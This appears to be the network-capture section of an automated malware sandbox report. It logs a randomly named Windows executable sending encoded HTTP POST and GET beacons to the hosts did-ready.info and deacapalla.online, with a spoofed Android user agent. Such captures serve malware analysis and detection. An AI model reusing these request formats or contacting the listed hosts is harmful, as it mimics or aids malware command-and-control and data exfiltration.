                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 35 72 71 4b 79 6a 62 6b 67 37 65 6e 59 78 52 54 49 72 32 4b 51 51 72 58 71 66 4f 54 2b 47 59 69 55 31 7a 30 6a 71 44 45 65 44 76 59 31 44 31 6c 51 68 48 49 57 50 79 78 45 35 77 36 52 74 78 74 42 4d 73 4a 49 6b 62 4f 47 59 58 52 4c 6e 68 56 59 77 42 78 4e 48 6e 6c 45 2b 77 36 76 6b 61 2b 46 31 58 4b 66 2f 51 59 59 62 6c 2b 5a 56 47 43 6d 58 4b 39 39 31 32 75 59 48 34 42 6f 6e 76 33 47 6e 45 6f 5a 62 4e 59 4a 51 35 6c 7a 55 47 2f 56 52 7a 4a 44 33 35 31 48 57 52 68 55 73 51 4e 42 44 4e 43 61 63 69 78 37 50 62 33 35 64 77 32 48 34 49 6b 53 64 68 2f 4a 30 48 4f 68 71 55 5a 45 77 42 45 46 78 63 6e 68 74 59 64 61 79 4b 57 42 39 34 33 44 33 78 37 64 77 4a 42 4c 36 2b 37 63 41 3d 3d
                                                                                                                    Data Ascii: nzs0T2=5rqKyjbkg7enYxRTIr2KQQrXqfOT+GYiU1z0jqDEeDvY1D1lQhHIWPyxE5w6RtxtBMsJIkbOGYXRLnhVYwBxNHnlE+w6vka+F1XKf/QYYbl+ZVGCmXK9912uYH4Bonv3GnEoZbNYJQ5lzUG/VRzJD351HWRhUsQNBDNCacix7Pb35dw2H4IkSdh/J0HOhqUZEwBEFxcnhtYdayKWB943D3x7dwJBL6+7cA==
                                                                                                                    Jan 10, 2025 20:50:08.595400095 CET725INHTTP/1.1 403 Forbidden
                                                                                                                    Server: nginx
                                                                                                                    Date: Fri, 10 Jan 2025 19:50:08 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                                                    Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    19192.168.2.650007194.245.148.189802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:50:10.539935112 CET1879OUTPOST /89qa/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.did-ready.info
                                                                                                                    Origin: http://www.did-ready.info
                                                                                                                    Referer: http://www.did-ready.info/89qa/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1247
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 35 72 71 4b 79 6a 62 6b 67 37 65 6e 59 78 52 54 49 72 32 4b 51 51 72 58 71 66 4f 54 2b 47 59 69 55 31 7a 30 6a 71 44 45 65 44 6e 59 31 78 39 6c 53 43 76 49 58 50 79 78 48 35 77 33 52 74 78 4b 42 4d 30 46 49 6b 6e 30 47 61 66 52 4c 45 5a 56 51 69 70 78 48 48 6e 6c 4c 65 77 2f 77 30 61 6e 46 31 48 4f 66 2f 41 59 59 62 6c 2b 5a 54 4b 43 76 69 6d 39 78 56 32 68 52 6e 34 4e 69 48 75 61 47 6e 63 34 5a 59 68 75 49 67 5a 6c 79 30 57 2f 5a 48 48 4a 46 6e 35 33 47 57 51 79 55 73 4d 37 42 44 42 4f 61 63 57 62 37 4d 48 33 35 5a 74 73 66 37 51 51 54 63 38 48 55 31 62 46 34 39 30 35 4e 7a 35 34 4a 41 38 33 6e 50 73 55 62 56 4c 49 50 50 46 62 54 6e 39 52 57 6c 51 2b 49 49 2f 76 48 6c 30 4e 69 6b 48 6c 71 6a 42 57 69 42 78 76 35 57 36 70 44 6b 30 32 65 54 6e 34 53 77 35 63 35 76 6b 4e 48 70 70 6c 70 35 65 30 75 33 35 42 63 6f 59 79 70 56 5a 6e 55 69 5a 69 4e 6e 66 46 46 30 48 76 52 42 66 7a 50 34 75 30 66 37 30 6e 77 44 43 38 4c 4b 51 6e 2b 65 62 63 56 78 31 57 58 67 74 6c 35 54 30 6a 6c 75 37 [TRUNCATED]
                                                                                                                    Data Ascii: nzs0T2=5rqKyjbkg7enYxRTIr2KQQrXqfOT+GYiU1z0jqDEeDnY1x9lSCvIXPyxH5w3RtxKBM0FIkn0GafRLEZVQipxHHnlLew/w0anF1HOf/AYYbl+ZTKCvim9xV2hRn4NiHuaGnc4ZYhuIgZly0W/ZHHJFn53GWQyUsM7BDBOacWb7MH35Ztsf7QQTc8HU1bF4905Nz54JA83nPsUbVLIPPFbTn9RWlQ+II/vHl0NikHlqjBWiBxv5W6pDk02eTn4Sw5c5vkNHpplp5e0u35BcoYypVZnUiZiNnfFF0HvRBfzP4u0f70nwDC8LKQn+ebcVx1WXgtl5T0jlu7aRHdiUsgwj9Fh6xlwUjSwhTC7ns0GvcEO8Vaesb+MIu/jiJxV18tovBl3aGLhsJCFGTp082xaoKUbLFABJWtmkvYrJKS6JOCjhd7S4dKmbmQmZwKlcOENw+q3op7cu439kw/9IiTqgG0mhxq8JtKl4AT1uZg1WYX5wk9vBA6Pq8GVYtfkvW4/uBB7Ra7z6QKnzvqT3/j3vAdeTtovuo7kLnDJY9YNzzrp3sHDK3EL/rgb6LSrGtTb32Ed5S+AbWrknJoPYHrd6N0EC6kuH3yFobojmtsk66H21YKJMJruD3MHno7GUvjLHvs+7kq3O/FaGsPESbwACzX5Ftkfmf60B+eps757N3BmfIKiR7uUb7yWrruHM2CN8oTYcCaSCBCHD9NPw0Rp21A4cdmftZlI6m84aYS3p/vKSTgxooZullAUtbHus48OA25hJjAjT7i2cLnKN7Dhz8DyvlUtRoBqjWSMBj7DHxpdCf06TUp301oygZcEF2qz9VaeJKIJaNXB3J+LnXb+WamMRfZ3WF4cQSW810C/bPJVG4HqXamgI4tssrehnHiEJdBObxaC3DkRHWNOVYZ1Lu0HjROWwYDogY9AA1M7zeqa5hBw2ewMjmXLWwIas6j2Y03wlsqC84okylTXKJ2VX1dbkIWmY6EAQbnN8WjTiOEP+ [TRUNCATED]
                                                                                                                    Jan 10, 2025 20:50:11.158746004 CET725INHTTP/1.1 403 Forbidden
                                                                                                                    Server: nginx
                                                                                                                    Date: Fri, 10 Jan 2025 19:50:11 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                                                    Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    20192.168.2.650008194.245.148.189802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:50:13.080565929 CET585OUTGET /89qa/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=0pCqxWaHoeLxNwZtE4rbCif976qK0EABSkz9gYzxYmn//CJHUgPOWYHQR+claPVZDeQXO3fZA6HYGFtXbggvb1fmL/sutHarBSn3QusyefFvRxXanRf+9ESPTUwnwk3mbGErQuw= HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.did-ready.info
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Jan 10, 2025 20:50:13.689943075 CET1236INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Fri, 10 Jan 2025 19:50:13 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Content-Length: 1840
                                                                                                                    Last-Modified: Tue, 04 Apr 2017 13:56:46 GMT
                                                                                                                    Connection: close
                                                                                                                    ETag: "58e3a61e-730"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 54 68 65 20 61 62 6f 76 65 20 33 20 6d 65 74 61 20 74 61 67 73 20 2a 6d 75 73 74 2a 20 63 6f 6d 65 20 66 69 72 73 74 20 69 6e 20 74 68 65 20 68 65 61 64 3b 20 61 6e 79 20 6f 74 68 65 72 20 68 65 61 64 20 63 6f 6e 74 65 6e 74 20 6d 75 73 74 20 63 6f 6d 65 20 2a 61 66 74 65 72 2a 20 74 68 65 73 65 20 74 61 67 73 20 2d 2d 3e 0a 20 20 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> ... The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags --> <meta name="description" content=""> <meta name="author" content=""> <meta http-equiv="refresh" content="5;url=/" /> <link rel="icon" href="../../favicon.ico"> <title>The requested page does not exist or is temporarily not available</title> ... Bootstrap core CSS --> <link href="./css/bootstrap.min.css" rel="stylesheet"> ... Custom styles for this template --> <link href="./css/parkingpage.css" rel="stylesheet"> </head> <body> <div class="container-fluid"> <div class="header clearfix"> <h3 class="text-muted"><img src="./images/JokerLogo2x.png"></h3> </div> </div><div class="
                                                                                                                    Jan 10, 2025 20:50:13.689954042 CET846INData Raw: 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 62 6f 74 72 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 33 22 3e 34 30 34 20 2d 20 70 61 67 65
                                                                                                                    Data Ascii: container"> <div class="jumbotron"> <h1 class="display-3">404 - page not found</h1> <p class="lead">The page that you have requested may have moved or does not exist. Please check the URL for proper spelling and capitaliz


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    21192.168.2.650009208.91.197.27802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:50:27.761631966 CET851OUTPOST /sdkp/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.deacapalla.online
                                                                                                                    Origin: http://www.deacapalla.online
                                                                                                                    Referer: http://www.deacapalla.online/sdkp/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 211
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 64 30 57 30 35 36 42 62 66 2b 43 58 62 71 54 53 33 34 62 31 4b 62 59 51 7a 70 34 45 74 6b 39 50 5a 77 31 50 44 67 59 6b 73 43 58 50 5a 46 38 36 4a 6e 47 31 54 59 4c 2f 59 77 39 6b 62 71 51 72 6e 7a 44 71 6f 39 51 79 30 33 39 4a 32 65 48 55 79 78 67 5a 4a 45 4d 73 6b 6c 59 6c 6d 45 64 6d 2f 70 6a 4b 52 30 31 66 47 48 46 77 49 34 75 50 34 51 5a 77 32 30 78 75 77 35 34 67 32 42 47 38 78 77 44 77 64 6d 49 4f 46 77 41 78 30 59 6b 4e 43 42 4c 43 4e 49 79 41 49 4c 4e 7a 37 50 59 7a 78 53 2b 64 72 4f 47 73 6e 75 76 65 6b 34 35 42 42 78 47 38 65 64 51 46 2f 39 72 56 65 54 43 49 63 4d 7a 48 57 44 61 77 77 55 68 41
                                                                                                                    Data Ascii: nzs0T2=d0W056Bbf+CXbqTS34b1KbYQzp4Etk9PZw1PDgYksCXPZF86JnG1TYL/Yw9kbqQrnzDqo9Qy039J2eHUyxgZJEMsklYlmEdm/pjKR01fGHFwI4uP4QZw20xuw54g2BG8xwDwdmIOFwAx0YkNCBLCNIyAILNz7PYzxS+drOGsnuvek45BBxG8edQF/9rVeTCIcMzHWDawwUhA


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    22192.168.2.650010208.91.197.27802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:50:30.399625063 CET875OUTPOST /sdkp/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.deacapalla.online
                                                                                                                    Origin: http://www.deacapalla.online
                                                                                                                    Referer: http://www.deacapalla.online/sdkp/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 235
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 64 30 57 30 35 36 42 62 66 2b 43 58 62 4c 44 53 37 2f 76 31 50 37 59 52 38 4a 34 45 34 30 39 4c 5a 77 35 50 44 68 64 38 76 77 7a 50 61 67 41 36 48 47 47 31 66 34 4c 2f 54 51 39 6c 57 4b 51 67 6e 7a 66 55 6f 2f 55 79 30 33 70 4a 32 63 66 55 7a 47 38 59 49 55 4d 75 73 46 59 6a 6f 6b 64 6d 2f 70 6a 4b 52 77 64 35 47 48 64 77 49 4a 2b 50 37 31 74 78 6f 45 78 74 6b 70 34 67 79 42 48 31 78 77 43 56 64 69 70 56 46 79 6f 78 30 64 59 4e 43 51 4c 42 44 49 79 47 57 37 4d 6a 39 50 64 68 2f 43 4c 74 69 34 75 6d 33 38 76 6d 68 4f 6b 62 64 43 47 66 4d 4e 77 48 2f 2f 7a 6e 65 7a 43 69 65 4d 4c 48 45 55 57 58 2f 67 45 6a 7a 2b 34 72 48 6a 74 4f 43 46 4d 68 72 75 30 48 54 2b 38 36 77 51 3d 3d
                                                                                                                    Data Ascii: nzs0T2=d0W056Bbf+CXbLDS7/v1P7YR8J4E409LZw5PDhd8vwzPagA6HGG1f4L/TQ9lWKQgnzfUo/Uy03pJ2cfUzG8YIUMusFYjokdm/pjKRwd5GHdwIJ+P71txoExtkp4gyBH1xwCVdipVFyox0dYNCQLBDIyGW7Mj9Pdh/CLti4um38vmhOkbdCGfMNwH//znezCieMLHEUWX/gEjz+4rHjtOCFMhru0HT+86wQ==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    23192.168.2.650011208.91.197.27802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:50:33.071135998 CET1888OUTPOST /sdkp/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.deacapalla.online
                                                                                                                    Origin: http://www.deacapalla.online
                                                                                                                    Referer: http://www.deacapalla.online/sdkp/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1247
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 64 30 57 30 35 36 42 62 66 2b 43 58 62 4c 44 53 37 2f 76 31 50 37 59 52 38 4a 34 45 34 30 39 4c 5a 77 35 50 44 68 64 38 76 77 37 50 5a 57 55 36 48 68 61 31 63 34 4c 2f 65 77 39 34 57 4b 51 48 6e 7a 48 59 6f 2f 49 49 30 30 52 4a 31 39 2f 55 30 7a 49 59 64 45 4d 75 75 46 59 6d 6d 45 64 7a 2f 76 44 4f 52 30 35 35 47 48 64 77 49 4b 32 50 76 51 5a 78 71 45 78 75 77 35 34 38 32 42 47 51 78 77 4b 6a 64 6b 30 67 46 44 49 78 30 38 6f 4e 4f 43 54 42 4c 49 79 2b 58 37 4e 6d 39 4f 67 2f 2f 43 6d 63 69 38 75 66 33 38 72 6d 67 4b 31 79 4b 77 47 54 64 38 59 42 68 4d 44 6d 48 6c 65 6f 54 64 33 36 43 6e 4b 45 2f 45 51 66 37 4b 45 75 4a 77 4d 70 44 47 51 59 70 70 39 50 51 2b 39 71 7a 66 50 6a 33 7a 63 6d 49 73 68 77 32 57 76 62 70 63 63 30 45 71 76 35 4f 6d 39 37 55 70 5a 61 39 73 6c 4a 2b 66 71 68 2f 57 31 44 50 35 43 2b 59 6d 70 64 2b 72 51 4d 43 51 37 47 53 6f 39 57 58 64 31 46 63 4f 32 68 63 6f 48 50 63 37 70 74 36 4f 35 45 36 2b 57 53 6f 56 4e 54 4b 51 52 2f 77 4c 62 54 52 61 36 79 76 46 73 [TRUNCATED]
                                                                                                                    Data Ascii: nzs0T2=d0W056Bbf+CXbLDS7/v1P7YR8J4E409LZw5PDhd8vw7PZWU6Hha1c4L/ew94WKQHnzHYo/II00RJ19/U0zIYdEMuuFYmmEdz/vDOR055GHdwIK2PvQZxqExuw5482BGQxwKjdk0gFDIx08oNOCTBLIy+X7Nm9Og//Cmci8uf38rmgK1yKwGTd8YBhMDmHleoTd36CnKE/EQf7KEuJwMpDGQYpp9PQ+9qzfPj3zcmIshw2Wvbpcc0Eqv5Om97UpZa9slJ+fqh/W1DP5C+Ympd+rQMCQ7GSo9WXd1FcO2hcoHPc7pt6O5E6+WSoVNTKQR/wLbTRa6yvFsMS9GApQXjpNvp66PYp+IkhgzMWmiT3kjgVfbfDN+lI9aPXyOmi2MnSz/5VvDIv3DNhPt4Dxj4r07EdDiMmir0a/a8VL93IS6lu02ghAylvN0/MSagY/Ro6kYG2+68Ps9kriRWeBuNQRAe1p7gG7955b7G8XlJkm66+BJoNbSh+AyToWP7pZuk6D1mA0OG+Yn8rtLIn1S5W2B0glWgElEPH/MvtcMNwSRk34RTxLkS9QEnJpyufsRbnm6mSsILTph8Bg0eAVmLrsEMwqiPH7974wXEwLNesbomuDaUyS4S8yyA6XslqF9e3pC64wPs5Cgb7xNTIJoZnrFSPdym4oMUjnBFZtW2Fj6/K1K14exYeY7Ohww8IxRdWHlHNfBjucWNxQPxvDKLmRLLCEBM/Mw4BygAbBLqf0TRqvyK46a8qH4qufVqPMyc/3YJ91Od/Y1t0fCa9Ybn5aW18hNSStJETgDdy8IfNjE0QvhkkySyARzh3JEPrmgAF68SzIw/zB/9bKyY/IcdwlQ0xhUieYTPSd/4lqgsJ6QCIn+D3etm0gaYifqw/Ea2OcBL7LnxqBQYCJsevuSY//4G7q8KzpqOXkkz0gVMwx34nQemcVy6j+qFrhs7yr8C0Pl5/1+eaS2WtIOW4kmeS53apo1iEqDfQyGPk6BTt52Ha [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    24192.168.2.650012208.91.197.27802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:50:35.627979040 CET588OUTGET /sdkp/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=Q2+U6NJof87KeL/xy+i0CIZPloZmzWZffj5EOQwXnkLhXENSPXaDW5SWGBVddIYwsB7Goe8a5E1AtdXY7h1Pcmgoj2AAtURgmOzcQSlReXoBGqrKsD90xFxRspg0pw2NsQGlTC8= HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.deacapalla.online
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Jan 10, 2025 20:50:36.650183916 CET1236INHTTP/1.1 200 OK
                                                                                                                    Date: Fri, 10 Jan 2025 19:50:35 GMT
                                                                                                                    Server: Apache
                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                    Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                    Set-Cookie: vsid=907vr4840842358331150; expires=Wed, 09-Jan-2030 19:50:35 GMT; Max-Age=157680000; path=/; domain=www.deacapalla.online; HttpOnly
                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_iAhWApJtlyOfhkbz25UuTo9BGc8Ug92SOg2rvUqQgzQnAQw0Awd2Vj2Xuc1dBIGXLBP2KCHOA74zxPqQYrK5HA==
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Connection: close
